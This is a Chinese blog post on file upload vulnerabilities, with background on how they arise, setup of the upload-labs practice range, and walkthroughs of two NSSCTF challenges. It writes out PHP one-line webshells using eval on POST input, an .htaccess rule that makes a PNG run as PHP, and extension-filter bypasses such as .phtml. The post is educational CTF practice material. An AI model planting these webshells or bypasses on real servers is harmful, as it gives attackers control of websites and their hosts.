文件上传浅谈

于 2024-03-22 16:59:13 发布
阅读量955 收藏 29
点赞数 13
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81105268/article/details/136941769
版权
本文详细解析了文件上传漏洞的概念,攻击过程,利用条件,以及可能带来的危害。通过实例演示如何利用一句话木马、.htaccess配置和渗透测试工具如蚁剑进行攻击。还介绍了upload-labs靶场和渗透测试实战情况。
摘要由CSDN通过智能技术生成

参考文章WEB入门——文件上传漏洞_htaccess文件上传漏洞-CSDN博客

文件上传漏洞详解-CSDN博客

网络安全之文件上传漏洞_文件上传漏洞的攻击过程-CSDN博客

一些概念

文件上传漏洞

文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。
  如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。

文件上传漏洞原理

文件上传漏洞是指用户通过界面上的上传功能上传了一个可执行的脚本文件,而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好。
  通过来说文件上传功能是没有问题的,主要是服务器如何对上传的文件如何进行处理。
  若WEB未对用户上传的文件进行有效的审查,若存在恶意用户对其上传一句话木马,从而实现控制WEB网站的目的。

文件上传漏洞可以利用的三个条件

  1. 文件可上传
  2. 上传文件可已被web容器解释执行
  3. .上传路径可知

文件上传导致的危害

1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
2、上传文件是Flash的策略文件crossdomain.xml,黑客用以
控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似)。 3、上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。
4、上传文件是钓鱼图片或者包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。
5、上传文件作为一个入口,溢出服务器的后台处理程序,如图片解析模块。
6、上传一个合法的文本文件,但是其内容是php脚本,通过文件包含使这个文本文件以脚本格式执行。可查看服务器目录,服务器中的文件,执行系统命令、代码等。

环境与工具

一句话木马

代码短,只有一行代码.

场景多,可以单独生成文件,也可以插入图片中

安全性高,隐匿性强,可变形免杀

.htaccess

<FilesMatch "1234.png">
SetHandler application/x-httpd-php
</FilesMatch>

1.jpg

<script language='php'>@eval($_POST['v']);</script>

1.png

<?php@eval($_POST['shell']);?>

phpinfo.phtml

<?php phpinfo(); ?>

 工具准备

中国蚁剑(AntSword):

 中国蚁剑- CSDN搜索

 小皮 :

phpstudy是一款PHP调试环境的程序集成包。简单来说,用上了这款软件,一个网站所需要的Web容器、数据库、PHP等就算是齐活了。phpstudy- CSDN搜索

https://www.xp.cn/

 哥斯拉 godzilla

https://github.com/BeichenDream/Godzilla

weevely

https://github.com/epinna/weevely3

搭建upload-labs环境

参考文章渗透测试——upload-labs环境部署_upload-loads phpstudy-CSDN博客

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。

https://github.com/c0ny1/upload-labs

将下载后的upload-labs安装包解压,解压路径为phpstudy目录下的www。

使用小皮创建网站

成功后使用小皮打开网站,或者直接访问:127.0.0.1/upload-labs-master

即可打开,页面如下

NSSCTF部分文件上传复现

[SWPUCTF 2021 新生赛]easyupload1.0

打开网站,文件上传类型题目

上传一句话木马,用bp抓包修改文件后缀。

GIF89a
<?=eval($_POST["good"]);?>

访问路径,上传成功

使用蚁剑连接

得到flag

提交上面的flag无效;尝试使用POST方式传参

执行phpinfo(); 命令看源码找到flag

[SWPUCTF 2021 新生赛]easyupload2.0

打开网页

判断为文件上传题,查看源代码

页面中提示上传文件为jpg文件,编写一句话木马并将后缀改为jpg再进行上传。

<script language='php'>@eval($_POST['v']);</script>

将文件jpg后缀修改为phtml进行绕过运行

上网查阅资料

发现用正则表达式过滤了.php/.hta/.ini,因而除了php以外的php文件都可以上传;

php3,php5,pht,phtml,phps都是php可运行的文件扩展名

上传成功

使用蚁剑进行连接

在目录中找到flag

Nernus
关注
  • 13
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传具体实现
weixin_43934702的博客
06-07 605
文件上传组件封装
Web安全之文件上传
最新发布
qq_42751192的博客
06-13 2474
文件上传漏洞是 Web 安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell 等到服务器执行,并最终获得网站控制权限的高危漏洞。大部分的网站和应用系统都有上传功能,而程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。
文件上传的三种方式-Java
u013733643的博客
11-30 7667
三种方式上传文件-Java
关于文件上传的几种方式
weixin_33775582的博客
04-26 147
上传之前 JavaScript 检测1:javascript判断上传文件的大小:在FireFox、Chrome浏览器中可以根据document.getElementById(“idoffile”).size 获取上传文件的大小(字节数),而IE浏览器中不支持该属性,只能借助标签的dynsrc属性,来间接实现获取文件的大小(但需要同意ActiveX控件的运行)。var ua = window.nav...
上传文件demo
01-04
前端多文件图片上传demo,前端多文件图片上传demo,前端多文件图片上传demo,前端多文件图片上传demo
浅谈关于Android WebView上传文件的解决方案
01-20
然而,当H5页面需要实现文件上传功能时,由于安全和权限限制,Android的WebView并不能直接弹出系统文件选择器。本文将详细介绍如何解决这个问题,以确保用户能够在WebView中顺利上传本地文件。 首先,我们需要确保...
浅谈struts1 & jquery form 文件异步上传
10-19
jQuery Form插件则提供了一种方便的方式来实现前端表单的异步提交,包括文件上传。 首先,我们需要创建HTML页面作为用户交互的界面。在示例代码中,我们看到一个简单的HTML表单,其中包含一个文件输入字段(`...
浅谈图片上传利用request.getInputStream()获取文件流时遇到的问题
08-28
"浅谈图片上传利用request.getInputStream()获取文件流时遇到的问题" 本文讨论了使用request.getInputStream()获取文件流时遇到的问题,并提供了两种获取文件流的方式,分别是使用DataInputStream和...
浅谈layui里的上传控件问题
12-13
很多时候,项目里都是需要上传功能的,现在就来研究研究, 首先,在html页面引入layui的包,如: <link rel="stylesheet" href="map/plug-in/scripts/layui/css/layui.css" rel="external nofollow" /> ...
上传文件的几种主要方法。
weixin_50377234的博客
05-31 1万+
上传文件的几种主要方法。 第一种:经典的form和input上传。 设置form的aciton为后端页面,enctype=“multipart/form-data”,type=‘post’ <form action='uploadFile.php' enctype="multipart/form-data" type='post'>   <input type='file'>   <input type='hidden' name='userid'>   <inpu
csdn如何上传附件
Bul1et的博客
04-16 1万+
首先登陆你的csdn博客,看到首页有个下载   点击下载 进去之后点击上传资源   然后就可以上传附件了   不过他会审核两天,不要着急,过两天就发布出来了...
上传文件
young_so_nice的博客
03-10 168
文件上传和下载
Fhvk
08-07 192
一、文件的上传和下载 文件上传和下载的必要前提: a:提拱form表单,method必须为post提交,使用的get的方式是不安全的,而且数据量太小 b:form表单的enctype必须是multipart/form-data c:提拱input type="file"类的上传输入域 enctype 作用:告知服务器请求正文的MIME(相当于文件的类型:如text,jsp)类型。(请求消息头:C...
使用http 上传文件的原理
热门推荐
ruixj的专栏
11-03 3万+
http 文件上传 RFC1867
前端上传文件的方式
非空盒子的博客
03-19 1万+
web上传文件方式介绍 在web浏览器上传文件一般有以下几种方式: form表单上传文件 原生js实现ajax上传文件 jquery实现ajax上传文件 form+iframe上传文件 其中form提交数据之后会整个刷新页面; js通过ajax上传文件虽然不会刷新整个页面,但是他们都是通过使用formdata对象实现的,formdata对象在老版本的浏览器中并不支持; 为了兼容老版本浏览器,使用i...
文件上传
辐_射的博客
06-23 525
package cn.itcast.shop.action; import java.io.File; import java.io.IOException; import java.util.Date; import java.util.List; import javax.annotation.Resource; import org.apache.commons.io.FileUtil
文件上传原理及流程
我的博客
06-28 1万+
感谢原博主: http://blog.sina.com.cn/s/blog_8f32dc250100wva8.html 一、HTTP文件上传 html   type:类型 name:名字 method:post (post与get的区别是,post下参数值不会放在url后面,更加安全) enctype:属性规定在发送到服务器之前应该如何对表单数据进行编码。 f
浅谈springboot
04-29
Spring Boot是一种基于Spring框架的快速开发应用程序的工具,它可以极大地简化Spring应用程序的配置和部署过程。Spring Boot利用“约定优于配置”的原则,来减少开发人员的工作量,使开发人员可以更加专注于业务逻辑...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值